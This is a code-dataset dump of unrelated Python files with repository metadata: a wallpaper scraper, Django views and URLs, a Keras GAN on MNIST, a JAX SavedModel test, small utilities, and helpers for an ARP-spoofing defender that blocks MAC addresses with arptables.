729c18ab3486454879df76cfbfa6752853d1f752
|
da424570955152f345b0e6b2ba53ab237168a88c
|
/dl_animals.py
|
6d76b28929290092439b1342a35f4d9885a3a93f
|
[] |
no_license
|
Holographic-Sol/crawl_wallpapers_craft
|
5baf532e8f87306e50e50b2088eb02303552c116
|
da0abfd142bc9205106f3ec234e64e02b2eb5bc8
|
refs/heads/master
| 2022-01-16T09:13:31.153235
| 2019-07-24T13:57:50
| 2019-07-24T13:57:50
| 198,302,067
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,912
|
py
|
import os
import requests
from bs4 import BeautifulSoup
import distutils.dir_util
import urllib.request
chosen_res = '1920x1080.jpg'
download_location = '../crawler_bot_wallparscraft_download/animals/'
if os.path.exists(download_location):
print('download location:', download_location)
elif not os.path.exists(download_location):
distutils.dir_util.mkpath(download_location)
print('download location:', download_location)
catalog_url = []
catalog_href = []
catalog_page_num = []
compiled_page_link = []
def func_1(): # 1. obtain a list of catalog's.
url = 'https://wallpaperscraft.com/'
rHead = requests.get(url)
data = rHead.text
soup = BeautifulSoup(data, "html.parser")
for row in soup.find_all('a'):
href = row.get('href')
if href is None:
pass
elif '/catalog/' in href:
catalog_href.append(href)
catalog = 'https://wallpaperscraft.com' + href
catalog_url.append(catalog)
def func_2(): # 2. crawl each catalog for number of pages.
i = 0
page_num = ''
for catalog_urls in catalog_url:
rHead = requests.get(catalog_url[i])
data = rHead.text
soup = BeautifulSoup(data, "html.parser")
for row in soup.find_all('a'):
href = row.get('href')
if href is None:
pass
elif href.startswith('/catalog/') and 'page' in href:
page_num = href.replace(catalog_href[i], '')
page_num = page_num.replace('/page', '')
catalog_page_num.append(page_num)
i += 1
def func_3(): # 3. compile list of links available to crawl (predicated upon category and page numbers).
i = 0
page_num = 1
for catalog_urls in catalog_url:
catalog_page_num_int = int(catalog_page_num[i])
# print(catalog_url[i])
while page_num <= catalog_page_num_int:
page_num_str = str(page_num)
page_link = catalog_url[i] + '/page' + page_num_str
if page_link.startswith('https://wallpaperscraft.com/catalog/animals/'):
print(page_link)
compiled_page_link.append(page_link)
page_num += 1
i += 1
page_num = 1
def func_4():
i = 0
for compiled_page_links in compiled_page_link:
rHead = requests.get(compiled_page_link[i])
data = rHead.text
soup = BeautifulSoup(data, "html.parser")
for row in soup.find_all('a'):
href = row.get('href')
if href is None:
pass
elif href.startswith('/wallpaper/'):
image_link = 'https://wallpaperscraft.com' + href
rHead = requests.get(image_link)
data = rHead.text
soup = BeautifulSoup(data, "html.parser")
for row in soup.find_all('a'):
href = row.get('href')
if href is None:
pass
elif href.startswith('/download/'):
img_page = 'https://wallpaperscraft.com' + href
rHead = requests.get(img_page)
data = rHead.text
soup = BeautifulSoup(data, "html.parser")
images = soup.findAll('img')
for image in images:
img_url = image['src']
if chosen_res != '':
if img_url.endswith(chosen_res):
fname = img_url.replace('https://images.wallpaperscraft.com/image/', '')
path_fname = download_location + fname
if not os.path.exists(path_fname):
print('page', i, 'downloading:', img_url)
urllib.request.urlretrieve(img_url, path_fname)
elif os.path.exists(path_fname):
print('page', i, 'skipping:', img_url)
elif img_url.endswith('.jpg') and chosen_res is '':
fname = img_url.replace('https://images.wallpaperscraft.com/image/', '')
path_fname = download_location + fname
if not os.path.exists(path_fname):
print('page', i, 'downloading:', img_url)
urllib.request.urlretrieve(img_url, path_fname)
elif os.path.exists(path_fname):
print('page', i, 'skipping:', img_url)
i += 1
func_1()
func_2()
func_3()
func_4()
|
[
"noreply@github.com"
] |
Holographic-Sol.noreply@github.com
|
3ddefa654204ee814e07e0388f148ed0822a75c6
|
cef0d939d347ba997a8582c98d2e0ae5d869a41f
|
/bootleg/urls.py
|
330b1ba87c0cc30b6632a6b52ad10c1384d0e618
|
[] |
no_license
|
caodac/ncats_bootleg_access
|
5e2c629b4891d9f3ed81ee412ac6bfed064c4ac6
|
29391f2ac6886e5b9721693f6e95b6c116cd8e6e
|
refs/heads/master
| 2022-10-03T23:35:35.747774
| 2020-06-08T03:41:09
| 2020-06-08T03:41:09
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,500
|
py
|
from django.urls import path, reverse
from . import views
urlpatterns = [
path(r'', views.home, name='bootleg-home'),
# authentication views
path(r'signin', views.sign_in, name='bootleg-signin'),
path(r'signout', views.sign_out, name='bootleg-signout'),
path(r'callback', views.callback, name='bootleg-callback'),
path(r'auth', views.auth, name='bootleg-auth'),
path(r'verify', views.verify, name='bootleg-verify'),
path(r'login', views.bootleg_login, name='bootleg-login'),
# app content views
path(r'calendar', views.calendar, name='bootleg-calendar'),
path(r'messages/new', views.message_new, name='bootleg-message-new'),
path(r'messages/<id>', views.message, name='bootleg-message'),
path(r'messages/<id>/body', views.message_body,
name='bootleg-message-body'),
path(r'messages/<id>/<type>', views.message_send,
name='bootleg-message-send'),
path(r'messages', views.messages, name='bootleg-messages'),
# app content api
path(r'api/avatar', views.api_profile_photo, name='bootleg-api-avatar'),
path(r'api/messages/new', views.api_message_new,
name='bootleg-api-message-new'),
path(r'api/messages/<id>', views.api_message,
name='bootleg-api-message'),
path(r'api/messages/<id>/attachment/<attachment_id>',
views.api_message_attachment_content,
name='bootleg-api-message-attachment'),
path(r'api/people', views.api_people, name='bootleg-api-people'),
]
|
[
"caodac@gmail.com"
] |
caodac@gmail.com
|
7252cc8f913a94a2033b958de05b74e2e420e3c6
|
83ee2f4b88746ffd86479f54061cac56521cf7cc
|
/examples/plugin_example/plugin.py
|
38a784d6fbc8bb9e4a0c32121ec134d6317cf844
|
[
"MIT"
] |
permissive
|
r2en/pysen
|
0ae0231e3cf902585151ab0488845634bf2de7a4
|
be7666856cf99f07fc77c9d5fc0a9385498505e6
|
refs/heads/main
| 2023-03-29T10:22:36.408476
| 2021-04-03T00:53:59
| 2021-04-03T00:53:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,664
|
py
|
import dataclasses
import pathlib
import subprocess
from typing import DefaultDict, List, Sequence
import dacite
from pysen.command import CommandBase
from pysen.component import ComponentBase, RunOptions
from pysen.path import change_dir
from pysen.plugin import PluginBase
from pysen.pyproject_model import Config, PluginConfig
from pysen.reporter import Reporter
from pysen.runner_options import PathContext
from pysen.setting import SettingFile
class ShellCommand(CommandBase):
def __init__(self, name: str, base_dir: pathlib.Path, cmd: Sequence[str]) -> None:
self._name = name
self._base_dir = base_dir
self._cmd = cmd
@property
def name(self) -> str:
return self._name
def __call__(self, reporter: Reporter) -> int:
with change_dir(self._base_dir):
try:
ret = subprocess.run(self._cmd)
reporter.logger.info(f"{self._cmd} returns {ret.returncode}")
return ret.returncode
except BaseException as e:
reporter.logger.info(
f"an error occured while executing: {self._cmd}\n{e}"
)
return 255
class ShellComponent(ComponentBase):
def __init__(self, name: str, cmd: Sequence[str], targets: Sequence[str]) -> None:
self._name = name
self._cmd = cmd
self._targets = targets
@property
def name(self) -> str:
return self._name
def export_settings(
self, paths: PathContext, files: DefaultDict[str, SettingFile],
) -> None:
print(f"Called export_settings at {self._name}: do nothing")
@property
def targets(self) -> Sequence[str]:
return self._targets
def create_command(
self, target: str, paths: PathContext, options: RunOptions
) -> CommandBase:
assert target in self._targets
return ShellCommand(self._name, paths.base_dir, self._cmd)
@dataclasses.dataclass
class ShellPluginConfig:
name: str
command: List[str]
targets: List[str]
class ShellPlugin(PluginBase):
def load(
self, file_path: pathlib.Path, config_data: PluginConfig, root: Config
) -> Sequence[ComponentBase]:
assert (
config_data.config is not None
), f"{config_data.location}.config must be not None"
config = dacite.from_dict(
ShellPluginConfig, config_data.config, dacite.Config(strict=True)
)
return [ShellComponent(config.name, config.command, config.targets)]
# NOTE(igarashi): This is the entry point of a plugin method
def plugin() -> PluginBase:
return ShellPlugin()
|
[
"igarashi@preferred.jp"
] |
igarashi@preferred.jp
|
908c0b939a94bf22827f916a648c080ee523b568
|
8eea6dc3e55a28dd956c794a98a06d989966a5f2
|
/socialmedia/views.py
|
4e8406b5c4326358206320bf412e4e95d2cc3c40
|
[] |
no_license
|
m-sounak/Sociefy
|
c4440e5811345ba2164ba0bd67f4d9fef8d9e26c
|
ebb08a9add286145ee050aac339fb137914ad97e
|
refs/heads/master
| 2023-02-18T00:40:50.648913
| 2021-01-19T10:30:08
| 2021-01-19T10:30:08
| 330,941,758
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 230
|
py
|
from django.views.generic import TemplateView
class TestPage(TemplateView):
template_name = 'test.html'
class ThanksPage(TemplateView):
template_name = 'thanks.html'
class HomePage(TemplateView):
template_name = 'index.html'
|
[
"sounakmajumder472@gmail.com"
] |
sounakmajumder472@gmail.com
|
e57f5fe36e1e98cfe8da5db57b7a967875c6d373
|
90b0b959da8adee5825efa12b212e5e76ba4837f
|
/GAN/GAN.py
|
8565d8b1655ff4e6eaf2926468df5ba3d6e1482c
|
[] |
no_license
|
madhureelatha/GAN-vs-VAE-Performance-Analysis
|
6ec1e95ee29cf1b5d5786cadb01ae17986087fbc
|
47909dff0688838ed7f9e24b11997e62f09c3ca2
|
refs/heads/master
| 2023-01-23T21:39:00.717079
| 2020-12-13T04:51:46
| 2020-12-13T04:51:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,591
|
py
|
# -*- coding: utf-8 -*-
"""Allam.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1DYWUkFxQyrRpphg8a-zlnVlPV43nAn1U
"""
import pydot
from keras.datasets import mnist
from keras.layers import Input, Dense, Reshape, Flatten, Dropout
from keras.layers import BatchNormalization, Activation, ZeroPadding2D
from keras.layers.advanced_activations import LeakyReLU
from keras.layers.convolutional import UpSampling2D, Conv2D, Conv2DTranspose
from keras.models import Sequential, Model
from keras.optimizers import Adam
from keras.utils.vis_utils import plot_model
import matplotlib.pyplot as plt
import sys
import os
import numpy as np
img_rows = 28
img_cols = 28
channels = 1
img_shape = (img_rows, img_cols, channels)
latent_dim = 100
optimizer = Adam(learning_rate=0.0002, beta_1=0.5)
def build_generator():
model = Sequential(name='generator')
model.add(Dense(256, input_dim=latent_dim))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
#model.add(Reshape((7, 7, 128)))
model.add(Dense(512))
#model.add(Conv2DTranspose(128, (4, 4), strides=(2, 2), padding='same'))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
#.add(Conv2DTranspose(128, (4, 4), strides=(2, 2), padding='same'))
model.add(Dense(1024))
model.add(LeakyReLU(alpha=0.2))
model.add(BatchNormalization(momentum=0.8))
#model.add(Conv2D(1, (7, 7), activation='sigmoid', padding='same'))
model.add(Dense(np.prod(img_shape), activation='tanh'))
model.add(Reshape(img_shape))
model.summary()
noise = Input(shape=(latent_dim,))
img = model(noise)
return Model(noise, img)
def build_discriminator():
model = Sequential(name='discriminator')
model.add(Flatten(input_shape=img_shape))
#model.add(Conv2D(64, (3, 3), strides=(2, 2), padding='same', input_shape=(28, 28, 1)))
model.add(Dense(512))
model.add(LeakyReLU(alpha=0.2))
#model.add(Dropout(0.4))
model.add(Dense(256))
#model.add(Conv2D(64, (3, 3), strides=(2, 2), padding='same'))
model.add(LeakyReLU(alpha=0.2))
#model.add(Dropout(0.4))
model.add(Flatten())
model.add(Dense(1, activation='sigmoid'))
model.summary()
img = Input(shape=img_shape)
validity = model(img)
return Model(img, validity)
def train(epochs, t_data, batch_size=64, sample_interval=50):
res_g_loss = []
t_data = t_data / 127.5 - 1.
t_data = np.expand_dims(t_data, axis=3)
valid = np.ones((batch_size, 1))
fake = np.zeros((batch_size, 1))
for epoch in range(epochs):
idx = np.random.randint(0, t_data.shape[0], batch_size)
imgs = t_data[idx]
noise = np.random.normal(0, 1, (batch_size, latent_dim))
gen_imgs = generator.predict(noise)
d_loss_real = discriminator.train_on_batch(imgs, valid)
d_loss_fake = discriminator.train_on_batch(gen_imgs, fake)
d_loss = 0.5 * np.add(d_loss_real, d_loss_fake)
noise = np.random.normal(0, 1, (batch_size, latent_dim))
g_loss = combined.train_on_batch(noise, valid)
res_g_loss.append(g_loss)
print("%d [d_loss_real: %.4f, d_loss_fake: %.4f] [g_loss: %.4f]" % (epoch, d_loss[0], d_loss[1], g_loss))
if epoch % sample_interval == 0:
sample_images(epoch)
return res_g_loss
def sample_images(epoch):
r, c = 5, 5
noise = np.random.normal(0, 1, (r * c, latent_dim))
gen_imgs = generator.predict(noise)
gen_imgs = 0.5 * gen_imgs + 0.5
fig, axs = plt.subplots(r, c)
cnt = 0
for i in range(r):
for j in range(c):
axs[i, j].imshow(gen_imgs[cnt, :, :, 0], cmap='gray')
axs[i, j].axis('off')
cnt += 1
fig.savefig("images/%d.png" % epoch)
plt.close()
discriminator = build_discriminator()
discriminator.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])
generator = build_generator()
gan_input = Input(shape=(latent_dim,))
img = generator(gan_input)
discriminator.trainable = False
validity = discriminator(img)
combined = Model(gan_input, validity)
combined.compile(loss='binary_crossentropy', optimizer=optimizer)
if not os.path.exists("./images"):
os.makedirs("./images")
(X_train, Y_train), (X_test, Y_test) = mnist.load_data()
X_total = np.concatenate((X_train, X_test), axis=0)
gan = GAN()
g_loss = train(epochs=10000, batch_size=200, sample_interval=100, t_data=X_total)
print(np.mean(g_loss))
plt.figure()
plt.plot(g_loss)
plt.xlabel("epochs")
plt.ylabel("g_loss")
plt.savefig("images/g_loss.jpg")
|
[
"kurchetinagaganeshsing@gmail.com"
] |
kurchetinagaganeshsing@gmail.com
|
54fc4b571d0a019cf447302ece1dbbcbd640f3f2
|
c075d28fe2f947b62cdc6b824a9619b3da249a9b
|
/Message.py
|
e6570ebddb157dcd34c40f70651f5fd8608fe182
|
[] |
no_license
|
ahiaplee/REST_API
|
274554df54ebb8f40e089ddbd6e3e4a35715e217
|
d873893a434652b889d1db3a7d0b4b10d82b2488
|
refs/heads/master
| 2023-07-11T14:50:27.429509
| 2021-08-23T09:33:17
| 2021-08-23T09:33:17
| 398,561,701
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 223
|
py
|
""" Helper function to construct message of object
"""
def Message(success, msg, data = None):
return {
"success" : success,
"message" : str(msg),
"data" : None if data is None else (data)
}
|
[
"anghiaplee@gmail.com"
] |
anghiaplee@gmail.com
|
d2551746212128238ed588764eaf2295cdb5161e
|
e4831f5a12c5b96473dd1717d1c4f194d7eef211
|
/jax/experimental/jax_to_tf/tests/savedmodel_test.py
|
b52ddf209cf57e43650933bf1893c17ba9f9c151
|
[
"Apache-2.0"
] |
permissive
|
qiuminxu/jax
|
9fe52053d49f83638a1a85325e8bb99f3143f1f5
|
563b65e8c505cfdbf0184dd55f40319e286137fd
|
refs/heads/master
| 2023-01-31T06:23:52.743231
| 2020-06-08T22:11:49
| 2020-06-08T22:11:49
| 270,889,360
| 0
| 0
|
NOASSERTION
| 2020-06-09T03:00:17
| 2020-06-09T03:00:16
| null |
UTF-8
|
Python
| false
| false
| 1,559
|
py
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from absl.testing import absltest
import jax
import jax.numpy as jnp
import numpy as np
import tensorflow as tf # type: ignore[import]
from jax.experimental import jax_to_tf
from jax.experimental.jax_to_tf.tests import tf_test_util
from jax.config import config
config.parse_flags_with_absl()
class SavedModelTest(tf_test_util.JaxToTfTestCase):
def testSavedModel(self):
f_jax = jax.jit(lambda x: jnp.sin(jnp.cos(x)))
model = tf.Module()
model.f = tf.function(jax_to_tf.convert(f_jax),
input_signature=[tf.TensorSpec([], tf.float32)])
x = np.array(0.7)
self.assertAllClose(model.f(x), f_jax(x))
# Roundtrip through saved model on disk.
model_dir = os.path.join(absltest.get_default_test_tmpdir(), str(id(model)))
tf.saved_model.save(model, model_dir)
restored_model = tf.saved_model.load(model_dir)
self.assertAllClose(restored_model.f(x), f_jax(x))
if __name__ == "__main__":
absltest.main()
|
[
"noreply@github.com"
] |
qiuminxu.noreply@github.com
|
6af69148a5b1b6b792f560886f4ce0b71ad1b082
|
d557289b9836dd1a426f15f0a463439b98dadaa3
|
/mergeArraySort.py
|
cd3e3acd8d3274061443b2958c29f2ba70769fd0
|
[] |
no_license
|
SmartChandru/GUVI-code-kata
|
dced9cd3fa37ee0e89eb2a0c79899744e353eb0a
|
01c136d72236c968f98f608eb10606cd5fdf5d26
|
refs/heads/master
| 2020-07-11T05:54:43.508259
| 2019-12-08T11:24:17
| 2019-12-08T11:24:17
| 204,460,960
| 1
| 0
| null | 2019-09-05T11:41:05
| 2019-08-26T11:27:06
|
Python
|
UTF-8
|
Python
| false
| false
| 249
|
py
|
n= int(input())
a=[]
m=0
for i in range(n):
b = list(map(int,input().split()))
a.extend(b)
m += len(b)
#print(a,m)
for i in range(0,m-1):
for j in range(i+1,m):
if a[i]>a[j]:
a[i], a[j] = a[j], a[i]
for i in a:
print(i,end=" ")
|
[
"noreply@github.com"
] |
SmartChandru.noreply@github.com
|
a1f12ca70ae451570ddc939d19e4b36b84558e06
|
6c2ddf52efccdfa15ce073da0e74d3352d5108c4
|
/idact/detail/config/validation/validate_scratch.py
|
b7e377e1a140ad61d79142b999a2e7a703c9e2ef
|
[
"MIT"
] |
permissive
|
intdata-bsc/idact
|
4bff248e644629b7ec634b282d790c305fc6703d
|
54cb65a711c145351e205970c27c83e6393cccf5
|
refs/heads/develop
| 2020-05-17T20:33:52.890970
| 2019-12-26T00:03:58
| 2019-12-26T00:03:58
| 183,949,088
| 0
| 0
|
MIT
| 2019-12-26T00:03:59
| 2019-04-28T19:18:58
|
Python
|
UTF-8
|
Python
| false
| false
| 1,284
|
py
|
"""This module contains a function for validating a scratch config entry."""
import re
from idact.detail.config.validation.validation_error_message import \
validation_error_message
VALID_SCRATCH_DESCRIPTION = 'Non-empty absolute path, or environment' \
' variable name.'
VALID_SCRATCH_REGEX = r"^(/.*)|(\$[A-Za-z][A-Za-z0-9]*)$" # noqa, pylint: disable=line-too-long
__COMPILED = re.compile(pattern=VALID_SCRATCH_REGEX)
def validate_scratch(scratch) -> str:
"""Returns the parameter if it's a valid scratch config entry, otherwise
raises an exception.
Key path is optional, non-empty string.
:param scratch: Object to validate.
:raises TypeError: On wrong type.
:raises ValueError: On regex mismatch.
"""
if not isinstance(scratch, str):
raise TypeError(validation_error_message(
label='scratch',
value=scratch,
expected=VALID_SCRATCH_DESCRIPTION,
regex=VALID_SCRATCH_REGEX))
if not __COMPILED.match(scratch):
raise ValueError(validation_error_message(
label='scratch',
value=scratch,
expected=VALID_SCRATCH_DESCRIPTION,
regex=VALID_SCRATCH_REGEX))
return scratch
|
[
"matt.garstka@gmail.com"
] |
matt.garstka@gmail.com
|
4a5ece018daaf2a028be2d2641cdeba80fe55294
|
483003faa1de6b564b601addbe4c27642b6abb9b
|
/app/core/migrations/0004_ingredient.py
|
f5e6218c5327eb8b9972e60caeff229f553c78fd
|
[
"MIT"
] |
permissive
|
AncientDemagogue/recipe-app-api
|
b177ecb273ee1cd026244711dc0cf5d0f09c9c41
|
908a7d16b9ff3ae031760d7752ea3392a4030c94
|
refs/heads/master
| 2020-09-07T02:39:23.967655
| 2019-11-19T09:05:48
| 2019-11-19T09:05:48
| 220,632,446
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 686
|
py
|
# Generated by Django 2.1.14 on 2019-11-13 13:05
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('core', '0003_tag'),
]
operations = [
migrations.CreateModel(
name='Ingredient',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=255)),
('user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
[
"domagojbakota@gmail.com"
] |
domagojbakota@gmail.com
|
b025b0483c8f7cb1cb518a99a5f5b1114bcfa738
|
64647c6dffa78246cb0ef80091c2a1461d100e1f
|
/pomdp_problems/util.py
|
27a06e4cff5114d31f240a92985c802a33b4597a
|
[
"MIT"
] |
permissive
|
Semanti1/pomdp_findit
|
28543519dbc30f864d15b9c682470e14483732c6
|
b96c1c06aab4b485fa005654cf6438ff63718083
|
refs/heads/main
| 2023-07-20T20:18:34.632833
| 2021-09-02T15:58:49
| 2021-09-02T15:58:49
| 397,013,529
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,786
|
py
|
import matplotlib.pyplot as plt
from matplotlib.collections import PolyCollection
import numpy as np
import matplotlib.lines as lines
import math
# Convenient color utilities
def rgb_to_hex(rgb):
return "#%02x%02x%02x" % (rgb[0], rgb[1], rgb[2])
def hex_to_rgb(hx):
"""hx is a string, begins with #. ASSUME len(hx)=7."""
if len(hx) != 7:
raise ValueError("Hex must be #------")
hx = hx[1:] # omit the '#'
r = int('0x'+hx[:2], 16)
g = int('0x'+hx[2:4], 16)
b = int('0x'+hx[4:6], 16)
return (r,g,b)
def inverse_color_rgb(rgb):
r,g,b = rgb
return (255-r, 255-g, 255-b)
def inverse_color_hex(hx):
"""hx is a string, begins with #. ASSUME len(hx)=7."""
return inverse_color_rgb(hex_to_rgb(hx))
def linear_color_gradient(rgb_start, rgb_end, n, normalize=False):
colors = [rgb_start]
for t in range(1, n):
color = tuple(
rgb_start[i] + float(t)/(n-1)*(rgb_end[i] - rgb_start[i])
for i in range(3)
)
if normalize:
color = tuple(color[i] / 255.0 for i in range(3))
colors.append(color)
return colors
def rgb_to_grayscale(rgb):
r,g,b = rgb
return (0.2989*r, 0.5870*g, 0.1140*b)
# colors
def lighter(color, percent):
'''assumes color is rgb between (0, 0, 0) and (255, 255, 255)'''
color = np.array(color)
white = np.array([255, 255, 255])
vector = white-color
return color + vector * percent
# Plot polygons with colors
def plot_polygons(verts, colors, ax=None, edgecolor=None):
"""
`verts` is a sequence of ( verts0, verts1, ...) where verts_i is a sequence of
xy tuples of vertices, or an equivalent numpy array of shape (nv, 2).
`c` is a sequence of (color0, color1, ...) where color_i is a color,
represented by a hex string (7 characters #xxxxxx).
Creates a PolygonCollection object in the axis `ax`."""
if ax is None:
fig = plt.gcf()
ax = fig.add_subplot(1,1,1)
pc = PolyCollection(verts)
pc.set_edgecolor(edgecolor)
pc.set_facecolor(colors)
ax.add_collection(pc)
ax.set_xlabel('X axis')
ax.set_ylabel('Y axis')
def plot_line(ax, p1, p2,
linewidth=1, color='black', zorder=0, alpha=1.0, linestyle="-"):
p1x, p1y = p1
p2x, p2y = p2
line = lines.Line2D([p1x, p2x], [p1y, p2y],
linewidth=linewidth, color=color, zorder=zorder,
alpha=alpha, linestyle=linestyle)
ax.add_line(line)
def plot_circle(ax, center, radius, color="blue",
fill=False, zorder=0, linewidth=0,
edgecolor=None, label_text=None,
alpha=1.0, text_color="white"):
px, py = center
circ = plt.Circle((px, py), radius, facecolor=color, fill=fill,
zorder=zorder, linewidth=linewidth, edgecolor=edgecolor, alpha=alpha)
ax.add_artist(circ)
if label_text:
text = ax.text(px, py, label_text, color=text_color,
ha='center', va='center', size=7, weight='bold')
text.set_path_effects([path_effects.Stroke(linewidth=1, foreground='black'),
path_effects.Normal()])
# functional utilitiesx
def remap(oldval, oldmin, oldmax, newmin, newmax):
return (((oldval - oldmin) * (newmax - newmin)) / (oldmax - oldmin)) + newmin
# Utility functions
def euclidean_dist(p1, p2):
return math.sqrt(sum([(a - b)** 2 for a, b in zip(p1, p2)]))
def to_rad(deg):
return deg * math.pi / 180.0
def in_range(val, rang):
# Returns True if val is in range (a,b); Inclusive.
return val >= rang[0] and val <= rang[1]
|
[
"renia.basu1@gmail.com"
] |
renia.basu1@gmail.com
|
1b8c780b7f5c7f81ba7923dd10aed1db62b4fc37
|
3385e4c8bd568d72e891ebcb3914f42bdd844e7d
|
/learndjango/myapp/urls.py
|
fd2fd618e8de8ab00092cfe1693f4c722cef5554
|
[] |
no_license
|
elay-maharramli/Learn-Django
|
832518952167e4d0f28888cb31170e45973cb7b9
|
d1b9f28c848e49d306408c70f294f26b7394d26a
|
refs/heads/master
| 2022-05-29T00:37:19.666525
| 2020-04-26T05:59:41
| 2020-04-26T05:59:41
| 258,520,859
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 97
|
py
|
from django.urls import path
from . import views
urlpatterns = [
path('', views.contact),
]
|
[
"36122259+Maharramli@users.noreply.github.com"
] |
36122259+Maharramli@users.noreply.github.com
|
bd148516b05561d6e3d1ad496de909ab866d8ba6
|
29ec35b43d4eb15c603df3efa90f14cc0467b403
|
/utility/utils.py
|
a43237c9d50352074ee1fdc198251276cb57f6a4
|
[] |
no_license
|
zhongyr/CPSC852-arp-defender
|
92f906637928b4c05da178e3c4f4269f850e2916
|
1e529fc90401ea70fc341a2d20ec51544949d763
|
refs/heads/master
| 2020-09-14T03:46:42.785333
| 2019-12-04T08:44:07
| 2019-12-04T08:44:07
| 223,007,537
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,431
|
py
|
# -*- encoding: utf-8 -*-
import netifaces
import binascii
import socket
from os import system
def get_iface_info(iface_):
"""
get interface information
:param iface_: name of interface
:return: dict object including mac address and ip address
"""
info = netifaces.ifaddresses(iface_)
mac_addr = info[netifaces.AF_LINK][0]["addr"]
ip_addr = info[netifaces.AF_INET][0]["addr"]
return {"HW address": mac_addr, "IP address": ip_addr, "iface": iface_}
def mac_str2bin(mac_str_):
"""
convert string format mac address to binary format
:param mac_str_: 1a:2b:3c:4d:5e:6f
:return: b'1a2b3c4d5e6f' (binary data represented by hex str)
"""
return binascii.unhexlify(mac_str_.replace(':', ''))
def mac_bytes2str(mac_bytes_):
"""
convert bytes obj to mac address format string
:param mac_bytes_: bytes obj
:return: mack address format string
"""
hex_str = mac_bytes_.hex() # get hex like string from bytes: 'ffffffffffff'
return ':'.join(hex_str[i:i + 2] for i in range(0, 12, 2)) # prettify 'ff:ff:ff:ff:ff:ff'
def create_raw_socket(iface_):
"""
:param iface_: interface
:return: socket file descriptor
"""
_ETH_P_ARP = 0x0806
raw_socket = socket.socket(socket.PF_PACKET, # use PF_PACKET for low-level networking interface
socket.SOCK_RAW, # set type to raw socket
socket.htons(_ETH_P_ARP)) # we are only interested in ARP packets
raw_socket.bind((iface_, 0)) # bind interface, use reserved port number 0
return raw_socket
def compare_mac_addr(entry, rx_mac):
"""
compare the mac address from an entry with the mac address from response
:param entry:
:param rx_mac:
:return:
"""
if entry["HW address"] == rx_mac:
return True
return False
blacklist = []
def add_to_blacklist(entry):
"""
if an entry failed in validation, add it to blacklist.
We use arptables as our blacklist
:param entry: src_mac_address
:return: None
"""
blacklist.append(entry)
system("arptables -A INPUT --src-mac {} -j DROP".format(entry["HW address"]))
def CNTC_Handler(signum, frame):
"""
Clear all entries from arptables(blacklist) before exit
:return: None
"""
print("\nclear blacklist before exit")
system("arptables -F")
print("exit arp defender")
exit(0)
|
[
"yang_hanjie@163.com"
] |
yang_hanjie@163.com
|
cdb7f1b397956cb5a6c3293cce165a43df74e120
|
3e4b8fe54f11bf36f3615c21fdc1dca0ed00fe72
|
/month04/spider/day01/job/01_job.py
|
78867664d1c5536f2df7e72e0fcae9e195b7f49b
|
[] |
no_license
|
leinian85/year2019
|
30d66b1b209915301273f3c367bea224b1f449a4
|
2f573fa1c410e9db692bce65d445d0543fe39503
|
refs/heads/master
| 2020-06-21T20:06:34.220046
| 2019-11-04T06:37:02
| 2019-11-04T06:37:02
| 197,541,549
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 701
|
py
|
import re
import hashlib
html = '''
<div class="animal">
<p class="name">
<a title="Tiger"></a>
</p>
<p class="content">
Two tigers two tigers run fast
</p>
</div>
<div class="animal">
<p class="name">
<a title="Rabbit"></a>
</p>
<p class="content">
Small white rabbit white and white
</p>
</div>
'''
a = '123'
a.rstrip()
pattern = re.compile('<div class="animal">.*?title="(.*?)".*?<p class="content">(.*?)</p>',re.S)
r_list = pattern.findall(html)
r_list_new = [(name,content.strip()) for name,content in r_list]
print(r_list_new)
for name,content in r_list_new:
print("动物名称 :",name)
print("动物名称 :",content)
print("*"*40)
|
[
"42737521@qq.com"
] |
42737521@qq.com
|
bba070b319caee484ed5feee463a97aa3994144a
|
60f6d5804522e7b3ba75a989afe683456d9fa6cf
|
/manage.py
|
016e52226f066271d834ee762b0d7b0d3f2d613c
|
[] |
no_license
|
minzey/jogging-tracker
|
b773aa4ddbee3912592fd86534b310d19cd67874
|
fe2d8da65ed5812e3752f5c03873016e4fbd49e9
|
refs/heads/master
| 2023-07-08T16:12:51.847514
| 2021-08-09T14:11:07
| 2021-08-09T14:11:07
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 671
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'fitness_project.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"swati.13103444@gmail.com"
] |
swati.13103444@gmail.com
|
f931dd724fcf84d43040507097344a26d4c52a9c
|
